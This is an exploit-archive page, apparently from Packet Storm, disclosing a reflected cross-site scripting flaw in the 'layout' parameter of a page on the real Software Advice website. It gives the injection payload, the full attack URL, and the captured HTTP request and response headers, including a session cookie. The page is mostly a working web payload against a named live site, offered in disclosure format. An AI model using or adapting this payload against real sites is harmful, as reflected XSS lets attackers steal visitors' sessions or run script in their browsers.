exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Software Advice 1.0 Cross Site Scripting

Software Advice 1.0 Cross Site Scripting
Posted May 28, 2018
Authored by Ismail Tasdelen

Software Advice version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 7bc406a8580de28cdfb85b1124b94292bb3c70c3821030fa776315ab32a88bfb

Software Advice 1.0 Cross Site Scripting

Change Mirror Download
# Exploit Title: [ Reflected XSS at Software Advice ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https://www.softwareadvice.com/]

# Software Link: [ Software Advice Website ]

# Version: 1.0

# Tested on: Kali Linux

# Reflected XSS Payload : '-confirm`Ismail Tasdelen`-'

# HTTP REQUEST HEADER :

Request URL: https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
Request Method: GET
Status Code: 200
Remote Address: 23.221.165.35:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.softwareadvice.com
:method: GET
:path: /hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: PHPSESSID=84ghfoei5qehtisf94lk187es6; optimizelyEndUserId=oeu1527439807853r0.3055516258919597; _ga=GA1.2.53898763.1527439811; _gid=GA1.2.242573448.1527439811; hasSeenCookiesConsent=1; __utma=24246072.53898763.1527439811.1527439812.1527439812.1; __utmc=24246072; __utmz=24246072.1527439812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IR_gbd=softwareadvice.com; IR_PI=1527439811848.llloh2aehwq; lc_sso7520261=1527439812306; _gu=fc0f39ef-3375-48f4-8a23-f2bc31885a3a; __lc.visitor_id.7520261=S1527439814.38416b2f19; _gs=2.s(src=https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27)c[Desktop,Chrome,25:347:7992:,Windows,212.253.204.84]; __utmb=24246072.8.10.1527439812; _uetsid=_uetabcf556c; IR_8018=1527440320552%7C0%7C1527439811848; _gw=2.u[~0,~0,~0,~0,~0]v[~f5n0a,~8,~0]a()
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# HTTP RESPONSE HEADER :

accept-ranges: bytes
browser-cache: none
cache-control: max-age=0, no-cache, no-store
cache-type: default
content-encoding: gzip
content-length: 38319
content-type: text/html; charset=UTF-8
date: Sun, 27 May 2018 17:00:18 GMT
expires: Sun, 27 May 2018 17:00:18 GMT
front-end-https: on
hosted: web24
p3p: CP="CAO PSA OUR"
pragma: no-cache
server: nginx
status: 200
strict-transport-security: max-age=31536000
vary: Accept-Encoding
x-varnish: 10849666
x-varnish-cache: pass
x-varnish-ttl: 0

# Query String Parametres :

layout: '-confirm`Ismail Tasdelen`-'

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close